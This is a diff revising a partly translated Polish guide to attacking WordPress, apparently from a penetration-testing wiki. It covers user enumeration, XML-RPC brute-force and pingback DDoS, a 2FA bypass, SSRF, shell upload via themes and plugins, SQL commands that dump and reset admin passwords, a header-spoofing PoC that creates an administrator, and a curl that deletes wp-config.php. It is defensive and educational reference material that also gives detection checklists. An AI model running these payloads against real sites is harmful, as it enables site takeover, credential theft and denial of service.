 - **Administrator**
-- **Editor**: Publikuje i zarządza swoimi oraz cudzymi wpisami
+- **Editor**: Publikuje i zarządza własnymi i cudzymi wpisami
 - **Author**: Publikuje i zarządza własnymi wpisami
 - **Contributor**: Pisze i zarządza swoimi wpisami, ale nie może ich publikować
 - **Subscriber**: Przegląda wpisy i edytuje swój profil
@@ -46,7 +46,7 @@
 
 Sprawdź, czy możesz znaleźć pliki `/license.txt` lub `/readme.html`
 
-Wewnątrz **kod źródłowy** strony (przykład z [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)):
+W **kodzie źródłowym** strony (przykład z [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)):
 
 - grep
 ```bash
@@ -56,11 +56,11 @@ curl https://victim.com/ | grep 'content="WordPress'
 
 ![](<../../images/image (1111).png>)
 
-- pliki linków CSS
+- Pliki linków CSS
 
 ![](<../../images/image (533).png>)
 
-- pliki JavaScript
+- Pliki JavaScript
 
 ![](<../../images/image (524).png>)
 
@@ -72,44 +72,44 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp
 ```bash
 curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
 ```
-### Ogólne wyodrębnianie wersji
+### Wyodrębnianie wersji — ogólnie
 ```bash
 curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
 
 ```
 ## Aktywna enumeracja
 
-### Plugins and Themes
+### Wtyczki i motywy
 
-Prawdopodobnie nie będziesz w stanie znaleźć wszystkich Plugins i Themes. Aby odkryć wszystkie, będziesz musiał(a) **aktywnie Brute Force listę Plugins i Themes** (na szczęście istnieją zautomatyzowane narzędzia, które zawierają takie listy).
+Prawdopodobnie nie uda Ci się znaleźć wszystkich możliwych wtyczek i motywów. Aby odkryć je wszystkie, będziesz musiał **actively Brute Force a list of Plugins and Themes** (miejmy nadzieję, że istnieją zautomatyzowane narzędzia zawierające te listy).
 
 ### Użytkownicy
 
-- **ID Brute:** Otrzymujesz prawidłowych użytkowników z serwisu WordPress poprzez Brute Forcing identyfikatorów użytkowników:
+- **ID Brute:** Uzyskujesz poprawnych użytkowników z serwisu WordPress przez Brute Forcing ID użytkowników:
 ```bash
 curl -s -I -X GET http://blog.example.com/?author=1
 ```
-Jeśli odpowiedzi mają status **200** lub **30X**, oznacza to, że id jest **prawidłowe**. Jeśli odpowiedź ma status **400**, to id jest **nieprawidłowe**.
+Jeśli odpowiedzi mają status **200** lub **30X**, to oznacza, że id jest **prawidłowe**. Jeśli odpowiedź ma status **400**, to id jest **nieprawidłowe**.
 
-- **wp-json:** Możesz także próbować uzyskać informacje o użytkownikach, zapytując:
+- **wp-json:** Możesz także spróbować uzyskać informacje o użytkownikach, zapytując:
 ```bash
 curl http://blog.example.com/wp-json/wp/v2/users
 ```
-Inny endpoint `/wp-json/`, który może ujawnić pewne informacje o użytkownikach, to:
+Kolejny endpoint `/wp-json/`, który może ujawnić pewne informacje o użytkownikach, to:
 ```bash
 curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
 ```
-Zwróć uwagę, że ten endpoint ujawnia tylko użytkowników, którzy opublikowali post. **Dostarczone zostaną tylko informacje o użytkownikach, którzy mają tę funkcję włączoną**.
+Zwróć uwagę, że ten endpoint ujawnia tylko użytkowników, którzy opublikowali wpis. **Dostarczone będą tylko informacje o użytkownikach, którzy mają tę funkcję włączoną**.
 
-Zwróć też uwagę, że **/wp-json/wp/v2/pages** może leak IP addresses.
+Również zwróć uwagę, że **/wp-json/wp/v2/pages** może powodować leak adresów IP.
 
-- **Login username enumeration**: Podczas logowania przez **`/wp-login.php`** **komunikat** jest **inny** i wskazuje, czy podany **username** istnieje, czy nie.
+- **Login username enumeration**: Podczas logowania w **`/wp-login.php`** **komunikat** jest **inny** i wskazuje, czy podany **username** istnieje czy nie.
 
 ### XML-RPC
 
-Jeśli `xml-rpc.php` jest aktywny, możesz przeprowadzić credentials brute-force lub użyć go do uruchomienia DoS attacks na inne zasoby. (Możesz zautomatyzować ten proces[ using this](https://github.com/relarizky/wpxploit) na przykład).
+Jeśli `xml-rpc.php` jest aktywny, możesz przeprowadzić brute-force poświadczeń lub użyć go do przeprowadzenia DoS na inne zasoby. (Możesz zautomatyzować ten proces[ using this](https://github.com/relarizky/wpxploit) na przykład).
 
-Aby sprawdzić, czy jest aktywny, spróbuj uzyskać dostęp do _**/xmlrpc.php**_ i wyślij to żądanie:
+Aby sprawdzić, czy jest aktywny, spróbuj uzyskać dostęp do _**/xmlrpc.php**_ i wysłać to żądanie:
 
 **Sprawdź**
 ```html
@@ -120,9 +120,9 @@ Aby sprawdzić, czy jest aktywny, spróbuj uzyskać dostęp do _**/xmlrpc.php**_
 ```
 ![](https://h3llwings.files.wordpress.com/2019/01/list-of-functions.png?w=656)
 
-**Poświadczenia Bruteforce**
+**Credentials Bruteforce**
 
-**`wp.getUserBlogs`**, **`wp.getCategories`** lub **`metaWeblog.getUsersBlogs`** są niektórymi z metod, które można wykorzystać do brute-force poświadczeń. Jeśli znajdziesz którąkolwiek z nich, możesz wysłać coś takiego:
+**`wp.getUserBlogs`**, **`wp.getCategories`** lub **`metaWeblog.getUsersBlogs`** są niektórymi z metod, które można użyć do brute-force credentials. Jeśli znajdziesz którąkolwiek z nich, możesz wysłać coś takiego:
 ```html
 <methodCall>
 <methodName>wp.getUsersBlogs</methodName>
@@ -132,13 +132,13 @@ Aby sprawdzić, czy jest aktywny, spróbuj uzyskać dostęp do _**/xmlrpc.php**_
 </params>
 </methodCall>
 ```
-Komunikat _"Incorrect username or password"_ w odpowiedzi ze statusem 200 powinien się pojawić, jeśli poświadczenia są nieprawidłowe.
+Komunikat _"Nieprawidłowa nazwa użytkownika lub hasło"_ w odpowiedzi z kodem 200 powinien się pojawić, jeśli dane logowania są nieprawidłowe.
 
 ![](<../../images/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>)
 
 ![](<../../images/image (721).png>)
 
-Używając poprawnych poświadczeń możesz przesłać plik. W odpowiedzi pojawi się ścieżka ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
+Używając poprawnych danych logowania możesz przesłać plik. W odpowiedzi pojawi się ścieżka ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
 ```html
 <?xml version='1.0' encoding='utf-8'?>
 <methodCall>
@@ -174,12 +174,12 @@ Also there is a **faster way** to brute-force credentials using **`system.multic
 
 **Bypass 2FA**
 
-Ta metoda jest przeznaczona dla programów, nie dla ludzi, i jest stara — w związku z tym nie obsługuje 2FA. Jeśli więc masz valid creds, ale główny dostęp jest chroniony 2FA, **możesz być w stanie wykorzystać xmlrpc.php, aby zalogować się tymi creds, omijając 2FA**. Zwróć uwagę, że nie będziesz mógł wykonać wszystkich akcji dostępnych z poziomu konsoli, ale nadal możesz dojść do RCE, jak wyjaśnia Ippsec w [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s)
+Metoda ta jest przeznaczona dla programów, nie dla ludzi, i jest stara, więc nie obsługuje 2FA. Jeśli więc masz ważne creds, ale główny dostęp jest chroniony przez 2FA, **możesz być w stanie wykorzystać xmlrpc.php, aby zalogować się tymi creds, omijając 2FA**. Zauważ, że nie będziesz w stanie wykonać wszystkich akcji dostępnych przez konsolę, ale nadal możesz uzyskać RCE, jak wyjaśnia Ippsec w [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s)
 
 **DDoS or port scanning**
 
 If you can find the method _**pingback.ping**_ inside the list you can make the Wordpress send an arbitrary request to any host/port.\
-This can be used to ask **thousands** of Wordpress **sites** to **access** one **location** (so a **DDoS** is caused in that location) or you can use it to make **Wordpress** lo **scan** some internal **network** (you can indicate any port).
+This can be used to ask **thousands** of Wordpress **sites** to **access** one **location** (so a **DDoS** is caused in that location) or you can use it to make **Wordpress** to **scan** some internal **network** (you can indicate any port).
 ```html
 <methodCall>
 <methodName>pingback.ping</methodName>
@@ -191,9 +191,9 @@ This can be used to ask **thousands** of Wordpress **sites** to **access** one *
 ```
 ![](../../images/1_JaUYIZF8ZjDGGB7ocsZC-g.png)
 
-Jeśli otrzymasz **faultCode** z wartością **większą** niż **0** (17), oznacza to, że port jest otwarty.
+Jeśli otrzymasz **faultCode** o wartości **większej** niż **0** (17), oznacza to, że port jest otwarty.
 
-Zobacz użycie **`system.multicall`** w poprzedniej sekcji, aby dowiedzieć się, jak nadużyć tej metody i spowodować DDoS.
+Zwróć uwagę na użycie **`system.multicall`** w poprzedniej sekcji, aby dowiedzieć się, jak nadużyć tej metody, by spowodować DDoS.
 
 **DDoS**
 ```html
@@ -209,15 +209,15 @@ Zobacz użycie **`system.multicall`** w poprzedniej sekcji, aby dowiedzieć się
 
 ### wp-cron.php DoS
 
-Ten plik zwykle znajduje się w katalogu głównym strony Wordpress: **`/wp-cron.php`**\
-Gdy ten plik zostanie **accessed**, wykonywane jest "**heavy**" zapytanie MySQL (**query**), więc może być użyty przez **attackers** do spowodowania **DoS**.\
-Domyślnie `wp-cron.php` jest wywoływany przy każdym ładowaniu strony (za każdym razem gdy klient żąda dowolnej strony Wordpress), co na serwisach o dużym ruchu może powodować problemy (DoS).
+Ten plik zwykle znajduje się w katalogu root strony Wordpress: **`/wp-cron.php`**\
+Kiedy do tego pliku jest **uzyskany dostęp**, wykonywane jest "**heavy**" MySQL **query**, więc może być użyty przez **atakujących** do **spowodowania** **DoS**.\
+Ponadto, domyślnie `wp-cron.php` jest wywoływany przy każdym ładowaniu strony (za każdym razem, gdy klient żąda dowolnej strony Wordpress), co na stronach o dużym ruchu może powodować problemy (DoS).
 
-Zaleca się wyłączenie Wp-Cron i utworzenie prawdziwego cronjob na hoście, który będzie wykonywał potrzebne akcje w regularnych odstępach (bez powodowania problemów).
+Zaleca się wyłączyć Wp-Cron i utworzyć prawdziwe cronjob na hoście, które będą wykonywać potrzebne akcje w regularnych odstępach (bez powodowania problemów).
 
 ### /wp-json/oembed/1.0/proxy - SSRF
 
-Spróbuj uzyskać dostęp do _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ a strona Worpress może wykonać żądanie do Ciebie.
+Spróbuj uzyskać dostęp do _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ a strona Worpress może wysłać żądanie do Ciebie.
 
 This is the response when it doesn't work:
 
@@ -232,30 +232,30 @@ https://github.com/t0gu/quickpress/blob/master/core/requests.go
 
 To narzędzie sprawdza, czy istnieje **methodName: pingback.ping** oraz ścieżka **/wp-json/oembed/1.0/proxy**, a jeśli tak, próbuje je wykorzystać.
 
-## Automatyczne narzędzia
+## Narzędzia automatyczne
 ```bash
 cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
 wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
 #You can try to bruteforce the admin user using wpscan with "-U admin"
 ```
-## Uzyskaj dostęp przez nadpisanie bitu
+## Uzyskanie dostępu przez nadpisanie bitu
 
-To bardziej ciekawostka niż prawdziwy atak. W CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) można było odwrócić 1 bit w dowolnym pliku wordpress. Można było więc odwrócić pozycję `5389` w pliku `/var/www/html/wp-includes/user.php`, aby zastąpić operację NOT (`!`) instrukcją NOP.
+To bardziej ciekawostka niż prawdziwy atak. W CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) można było zmienić 1 bit w dowolnym pliku wordpress. Dzięki temu można było zmienić bit na pozycji `5389` w pliku `/var/www/html/wp-includes/user.php`, aby zastąpić operację NOT (`!`) instrukcją NOP.
 ```php
 if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
 return new WP_Error(
 ```
 ## **Panel RCE**
 
-**Modyfikacja pliku php z używanego motywu (potrzebne dane logowania admina)**
+**Modyfikacja pliku php w używanym motywie (admin credentials needed)**
 
-Wygląd → Edytor motywów → Szablon 404 (po prawej)
+Wygląd → Edytor motywu → Szablon 404 (po prawej)
 
 Zmień zawartość na php shell:
 
 ![](<../../images/image (384).png>)
 
-Wyszukaj w internecie, jak uzyskać dostęp do tej zaktualizowanej strony. W tym przypadku musisz wejść tutaj: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
+Wyszukaj w internecie, jak uzyskać dostęp do zaktualizowanej strony. W tym przypadku musisz wejść tutaj: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
 
 ### MSF
 
@@ -263,14 +263,14 @@ Możesz użyć:
 ```bash
 use exploit/unix/webapp/wp_admin_shell_upload
 ```
-aby uzyskać sesję.
+to get a session.
 
-## RCE przez wtyczkę
+## Plugin RCE
 
-### Wtyczka PHP
+### PHP plugin
 
-Możliwe, że da się przesłać pliki .php jako wtyczkę.  
-Utwórz swój php backdoor używając na przykład:
+Może być możliwe przesłanie plików .php jako wtyczki.\
+Utwórz swój backdoor w PHP używając na przykład:
 
 ![](<../../images/image (183).png>)
 
@@ -278,70 +278,70 @@ Następnie dodaj nową wtyczkę:
 
 ![](<../../images/image (722).png>)
 
-Prześlij wtyczkę i naciśnij Install Now:
+Prześlij wtyczkę i naciśnij "Install Now":
 
 ![](<../../images/image (249).png>)
 
-Kliknij na Procced:
+Kliknij "Proceed":
 
 ![](<../../images/image (70).png>)
 
-Prawdopodobnie to pozornie nic nie zrobi, ale jeśli przejdziesz do Media, zobaczysz przesłany shell:
+Prawdopodobnie pozornie nic się nie stanie, ale jeśli przejdziesz do Media, zobaczysz przesłany shell:
 
 ![](<../../images/image (462).png>)
 
-Otwórz go, a zobaczysz URL do uruchomienia reverse shell:
+Otwórz go, a zobaczysz URL do wykonania reverse shell:
 
 ![](<../../images/image (1006).png>)
 
 ### Uploading and activating malicious plugin
 
-Ta metoda polega na instalacji złośliwej wtyczki, o której wiadomo, że jest podatna i którą można wykorzystać do uzyskania web shella. Proces przeprowadza się przez dashboard WordPress w następujący sposób:
+Ta metoda polega na instalacji złośliwej wtyczki znanej z podatności, którą można wykorzystać do uzyskania web shella. Proces przeprowadza się przez WordPress dashboard w następujący sposób:
 
-1. **Plugin Acquisition**: wtyczka jest pobierana ze źródła takiego jak Exploit DB jak [**here**](https://www.exploit-db.com/exploits/36374).
+1. **Plugin Acquisition**: Wtyczka jest pobierana ze źródła takiego jak Exploit DB, np. [**here**](https://www.exploit-db.com/exploits/36374).
 2. **Plugin Installation**:
-- Przejdź do panelu WordPress, następnie do `Dashboard > Plugins > Upload Plugin`.
-- Prześlij plik zip pobranej wtyczki.
-3. **Plugin Activation**: Po pomyślnej instalacji wtyczkę należy aktywować przez dashboard.
+- Przejdź do pulpitu WordPress, następnie do `Dashboard > Plugins > Upload Plugin`.
+- Prześlij plik zip z pobraną wtyczką.
+3. **Plugin Activation**: Po pomyślnej instalacji wtyczka musi zostać aktywowana poprzez pulpit.
 4. **Exploitation**:
-- Po zainstalowaniu i aktywowaniu wtyczki "reflex-gallery" można ją wykorzystać, ponieważ jest znana z bycia podatną.
-- Metasploit framework udostępnia exploit dla tej podatności. Załadowanie odpowiedniego modułu i wykonanie specyficznych poleceń pozwala uzyskać sesję meterpreter, dając nieautoryzowany dostęp do serwisu.
-- Należy zauważyć, że to tylko jedna z wielu metod wykorzystania strony WordPress.
+- Po zainstalowaniu i aktywowaniu wtyczki "reflex-gallery" można ją wykorzystać, ponieważ jest znana z podatności.
+- Framework Metasploit dostarcza exploit dla tej podatności. Ładując odpowiedni moduł i wykonując konkretne polecenia można uzyskać sesję meterpreter, co daje nieautoryzowany dostęp do strony.
+- Należy zaznaczyć, że jest to tylko jedna z wielu metod eksploatacji strony WordPress.
 
-Treść zawiera materiały wizualne przedstawiające kroki w dashboard WordPress dotyczące instalacji i aktywacji wtyczki. Jednak ważne jest, aby zaznaczyć, że wykorzystywanie podatności w ten sposób jest nielegalne i nieetyczne bez odpowiedniej autoryzacji. Informacje te powinny być używane odpowiedzialnie i jedynie w kontekście prawnym, takich jak testy penetracyjne z wyraźną zgodą.
+Treść zawiera ilustracje przedstawiające kroki w dashboardzie WordPress związane z instalacją i aktywacją wtyczki. Ważne jest jednak, aby pamiętać, że wykorzystywanie podatności w ten sposób jest nielegalne i nieetyczne bez odpowiedniej autoryzacji. Informacje te powinny być wykorzystywane odpowiedzialnie i jedynie w kontekście prawnym, np. podczas testów penetracyjnych z wyraźnym pozwoleniem.
 
 **For more detailed steps check:** [**https://www.hackingarticles.in/wordpress-reverse-shell/**](https://www.hackingarticles.in/wordpress-reverse-shell/)
 
 ## From XSS to RCE
 
-- [**WPXStrike**](https://github.com/nowak0x01/WPXStrike): _**WPXStrike**_ to skrypt zaprojektowany do eskalacji podatności **Cross-Site Scripting (XSS)** do **Remote Code Execution (RCE)** lub innych krytycznych podatności w WordPress. For more info check [**this post**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). Zapewnia **support for Wordpress Versions 6.X.X, 5.X.X and 4.X.X. and allows to:**
+- [**WPXStrike**](https://github.com/nowak0x01/WPXStrike): _**WPXStrike**_ to skrypt zaprojektowany do eskalacji podatności typu **Cross-Site Scripting (XSS)** do **Remote Code Execution (RCE)** lub innych krytycznych podatności w WordPress. Po więcej informacji zobacz [**this post**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). Dostarcza **wsparcie dla wersji Wordpress 6.X.X, 5.X.X i 4.X.X i pozwala na:**
 - _**Privilege Escalation:**_ Tworzy użytkownika w WordPress.
-- _**(RCE) Custom Plugin (backdoor) Upload:**_ Prześlij własną wtyczkę (backdoor) do WordPress.
-- _**(RCE) Built-In Plugin Edit:**_ Edytuj wbudowaną wtyczkę w WordPress.
-- _**(RCE) Built-In Theme Edit:**_ Edytuj wbudowany motyw w WordPress.
-- _**(Custom) Custom Exploits:**_ Własne exploity dla third-party WordPress Plugins/Themes.
+- _**(RCE) Custom Plugin (backdoor) Upload:**_ Wgraj swój niestandardowy plugin (backdoor) do WordPress.
+- _**(RCE) Built-In Plugin Edit:**_ Edytuj wbudowane wtyczki w WordPress.
+- _**(RCE) Built-In Theme Edit:**_ Edytuj wbudowane motywy w WordPress.
+- _**(Custom) Custom Exploits:**_ Niestandardowe exploity dla wtyczek/motywów firm trzecich WordPress.
 
 ## Post Exploitation
 
-Wydobądź nazwy użytkowników i hasła:
+Wyodrębnij nazwy użytkowników i hasła:
 ```bash
 mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"
 ```
-Zmień hasło administratora:
+Zmień admin password:
 ```bash
 mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"
 ```
-## Wordpress Plugins Pentest
+## Pentest wtyczek Wordpress
 
 ### Powierzchnia ataku
 
-Zrozumienie, w jaki sposób wtyczka Wordpress może ujawniać funkcjonalność, jest kluczowe do odnalezienia podatności w jej działaniu. Możesz zobaczyć, w jaki sposób wtyczka może ujawniać funkcje w poniższych punktach oraz znaleźć kilka przykładów podatnych wtyczek w [**this blog post**](https://nowotarski.info/wordpress-nonce-authorization/).
+Znajomość sposobu, w jaki wtyczka Wordpress może ujawniać funkcjonalność, jest kluczowa do znalezienia podatności w jej funkcjonalnościach. Możesz znaleźć, jak wtyczka może udostępniać funkcje, w poniższych punktach oraz kilka przykładów podatnych wtyczek w [**this blog post**](https://nowotarski.info/wordpress-nonce-authorization/).
 
 - **`wp_ajax`**
 
-Jednym ze sposobów, w jaki wtyczka może udostępniać funkcje użytkownikom, są obsługi AJAX. Mogą one zawierać błędy w logice, autoryzacji lub uwierzytelnianiu. Co więcej, dość często te funkcje opierają zarówno uwierzytelnianie, jak i autoryzację na istnieniu wordpress nonce, które **każdy użytkownik zalogowany w instancji Wordpress może posiadać** (niezależnie od roli).
+Jednym ze sposobów, w jaki wtyczka może udostępniać funkcje użytkownikom, jest za pośrednictwem AJAX handlers. Mogą one zawierać błędy w logice, autoryzacji lub uwierzytelnianiu. Co więcej, dość często funkcje te będą opierać zarówno uwierzytelnianie, jak i autoryzację na istnieniu wordpress nonce, które **każdy użytkownik uwierzytelniony w instancji Wordpress może mieć** (niezależnie od jego roli).
 
-Oto funkcje, które mogą być użyte do udostępnienia funkcji we wtyczce:
+To są funkcje, które mogą być użyte do udostępnienia funkcji we wtyczce:
 ```php
 add_action( 'wp_ajax_action_name', array(&$this, 'function_name'));
 add_action( 'wp_ajax_nopriv_action_name', array(&$this, 'function_name'));
@@ -349,11 +349,11 @@ add_action( 'wp_ajax_nopriv_action_name', array(&$this, 'function_name'));
 **Użycie `nopriv` sprawia, że endpoint jest dostępny dla wszystkich użytkowników (nawet niezalogowanych).**
 
 > [!CAUTION]
-> Co więcej, jeśli funkcja jedynie sprawdza autoryzację użytkownika za pomocą funkcji `wp_verify_nonce`, ta funkcja tylko sprawdza, czy użytkownik jest zalogowany — zwykle nie weryfikuje roli użytkownika. W związku z tym użytkownicy o niskich uprawnieniach mogą mieć dostęp do operacji wymagających wyższych uprawnień.
+> Co więcej, jeśli funkcja jedynie sprawdza autoryzację użytkownika za pomocą funkcji `wp_verify_nonce`, to ta funkcja tylko weryfikuje, czy użytkownik jest zalogowany, zwykle nie sprawdza roli użytkownika. W rezultacie użytkownicy o niskich uprawnieniach mogą mieć dostęp do działań wymagających wyższych uprawnień.
 
 - **REST API**
 
-Możliwe jest również udostępnienie funkcji z wordpressa przez zarejestrowanie REST API za pomocą funkcji `register_rest_route`:
+Możliwe jest również udostępnienie funkcji z wordpress poprzez zarejestrowanie REST API za pomocą funkcji `register_rest_route`:
 ```php
 register_rest_route(
 $this->namespace, '/get/', array(
@@ -363,21 +363,21 @@ $this->namespace, '/get/', array(
 )
 );
 ```
-The `permission_callback` to callback do funkcji, która sprawdza, czy dany użytkownik jest uprawniony do wywołania metody API.
+The `permission_callback` jest funkcją zwrotną, która sprawdza, czy dany użytkownik jest uprawniony do wywołania metody API.
 
-**Jeśli użyta zostanie wbudowana funkcja `__return_true`, po prostu pominie ona sprawdzenie uprawnień użytkownika.**
+**Jeśli użyta zostanie wbudowana funkcja `__return_true`, po prostu pominie sprawdzenie uprawnień użytkownika.**
 
-- **Bezpośredni dostęp do pliku php**
+- **Bezpośredni dostęp do pliku PHP**
 
-Oczywiście Wordpress używa PHP, a pliki wewnątrz wtyczek są bezpośrednio dostępne z sieci. Jeśli wtyczka udostępnia podatną funkcjonalność, która jest wywoływana jedynie przez dostęp do pliku, będzie ona możliwa do wykorzystania przez każdego użytkownika.
+Oczywiście Wordpress używa PHP, a pliki wewnątrz wtyczek są bezpośrednio dostępne z internetu. Jeśli wtyczka ujawnia jakąkolwiek podatną funkcjonalność, która jest uruchamiana po samym dostępie do pliku, będzie ona możliwa do wykorzystania przez dowolnego użytkownika.
 
 ### Trusted-header REST impersonation (WooCommerce Payments ≤ 5.6.1)
 
-Niektóre wtyczki implementują skróty "trusted header" dla integracji wewnętrznych lub reverse proxies i następnie używają tego headera do ustawienia aktualnego kontekstu użytkownika dla żądań REST. Jeśli header nie jest kryptograficznie powiązany z żądaniem przez komponent upstream, atakujący może go sfałszować i trafić na uprzywilejowane REST route'y jako administrator.
+Niektóre wtyczki implementują skróty “trusted header” dla integracji wewnętrznych lub reverse proxy i następnie używają tego nagłówka do ustawienia kontekstu bieżącego użytkownika dla żądań REST. Jeśli nagłówek nie jest kryptograficznie powiązany z żądaniem przez komponent upstream, atakujący może go sfałszować i uzyskać dostęp do uprzywilejowanych tras REST jako administrator.
 
-- Wpływ: eskalacja uprawnień bez uwierzytelnienia do roli administratora przez utworzenie nowego administratora za pomocą core users REST route.
-- Przykładowy header: `X-Wcpay-Platform-Checkout-User: 1` (wymusza user ID 1, zazwyczaj pierwsze konto administratora).
-- Wykorzystywana ścieżka: `POST /wp-json/wp/v2/users` z tablicą z podwyższoną rolą.
+- Impact: eskalacja uprawnień bez uwierzytelnienia do administratora przez utworzenie nowego administratora za pomocą core users REST route.
+- Example header: `X-Wcpay-Platform-Checkout-User: 1` (wymusza user ID 1, zazwyczaj pierwsze konto administratora).
+- Exploited route: `POST /wp-json/wp/v2/users` with an elevated role array.
 
 PoC
 ```http
@@ -391,21 +391,21 @@ Content-Length: 114
 
 {"username": "honeypot", "email": "wafdemo@patch.stack", "password": "demo", "roles": ["administrator"]}
 ```
-Dlaczego to działa
+Why it works
 
-- Wtyczka mapuje nagłówek kontrolowany przez klienta na stan uwierzytelnienia i pomija sprawdzanie uprawnień.
-- WordPress core oczekuje uprawnienia `create_users` dla tej ścieżki; hack wtyczki omija to przez bezpośrednie ustawienie kontekstu bieżącego użytkownika na podstawie nagłówka.
+- The plugin maps a client-controlled header to authentication state and skips capability checks.
+- WordPress core expects `create_users` capability for this route; the plugin hack bypasses it by directly setting the current user context from the header.
 
-Oczekiwane wskaźniki sukcesu
+Expected success indicators
 
-- HTTP 201 z ciałem JSON opisującym utworzonego użytkownika.
-- Nowy użytkownik z uprawnieniami administratora widoczny w `wp-admin/users.php`.
+- HTTP 201 with a JSON body describing the created user.
+- A new admin user visible in `wp-admin/users.php`.
 
-Lista kontrolna wykrywania
+Detection checklist
 
 - Grep for `getallheaders()`, `$_SERVER['HTTP_...']`, or vendor SDKs that read custom headers to set user context (e.g., `wp_set_current_user()`, `wp_set_auth_cookie()`).
-- Przejrzyj rejestracje REST pod kątem uprzywilejowanych callbacków, które nie mają solidnych sprawdzeń `permission_callback` i zamiast tego polegają na nagłówkach żądania.
-- Szukaj użyć funkcji zarządzania użytkownikami rdzenia (`wp_insert_user`, `wp_create_user`) wewnątrz handlerów REST, które są zabezpieczone jedynie przez wartości nagłówków.
+- Review REST registrations for privileged callbacks that lack robust `permission_callback` checks and instead rely on request headers.
+- Look for usages of core user-management functions (`wp_insert_user`, `wp_create_user`) inside REST handlers that are gated only by header values.
 
 ### Nieautoryzowane dowolne usuwanie plików przez wp_ajax_nopriv (Litho Theme <= 3.0)
 
@@ -436,35 +436,35 @@ add_action( 'wp_ajax_nopriv_litho_remove_font_family_action_data', 'litho_remove
 ```
 Problemy wprowadzone przez ten fragment:
 
-* **Unauthenticated access** – the `wp_ajax_nopriv_` hook is registered.
-* **No nonce / capability check** – każdy odwiedzający może wywołać endpoint.
-* **No path sanitisation** – ciąg kontrolowany przez użytkownika `fontfamily` jest konkatenowany do filesystem path bez filtrowania, co pozwala na klasyczny `../../` traversal.
+* **Dostęp bez uwierzytelnienia** – hook `wp_ajax_nopriv_` jest zarejestrowany.
+* **Brak sprawdzenia nonce / uprawnień** – każdy odwiedzający może trafić w endpoint.
+* **Brak sanityzacji ścieżki** – ciąg kontrolowany przez użytkownika `fontfamily` jest konkatenowany do ścieżki systemu plików bez filtrowania, umożliwiając klasyczne przejście `../../`.
 
 #### Eksploatacja
 
-Atakujący może usunąć dowolny plik lub katalog **poniżej katalogu bazowego uploads** (zazwyczaj `<wp-root>/wp-content/uploads/`) wysyłając jedno żądanie HTTP POST:
+Atakujący może usunąć dowolny plik lub katalog **poniżej katalogu bazowego uploads** (zwykle `<wp-root>/wp-content/uploads/`) wysyłając jedno żądanie HTTP POST:
 ```bash
 curl -X POST https://victim.com/wp-admin/admin-ajax.php \
 -d 'action=litho_remove_font_family_action_data' \
 -d 'fontfamily=../../../../wp-config.php'
 ```
-Ponieważ `wp-config.php` znajduje się poza *uploads*, cztery sekwencje `../` wystarczą w domyślnej instalacji. Usunięcie `wp-config.php` wymusza na WordPress uruchomienie *kreatora instalacji* przy następnej wizycie, umożliwiając pełne przejęcie serwisu (atakujący jedynie dostarcza nową konfigurację DB i tworzy konto admina).
+Because `wp-config.php` lives outside *uploads*, four `../` sequences are enough on a default installation.  Deleting `wp-config.php` forces WordPress into the *installation wizard* on the next visit, enabling a full site take-over (the attacker merely supplies a new DB configuration and creates an admin user).
 
-Inne istotne cele to pliki `.php` w pluginach/motywach (aby złamać security plugins) lub reguły `.htaccess`.
+Other impactful targets include plugin/theme `.php` files (to break security plugins) or `.htaccess` rules.
 
-#### Lista kontrolna wykrywania
+#### Detection checklist
 
-* Każde wywołanie zwrotne `add_action( 'wp_ajax_nopriv_...')`, które wywołuje helpery systemu plików (`copy()`, `unlink()`, `$wp_filesystem->delete()`, itp.).
-* Łączenie niesanitizowanych danych wejściowych użytkownika w ścieżki (szukaj `$_POST`, `$_GET`, `$_REQUEST`).
-* Brak `check_ajax_referer()` oraz `current_user_can()`/`is_user_logged_in()`.
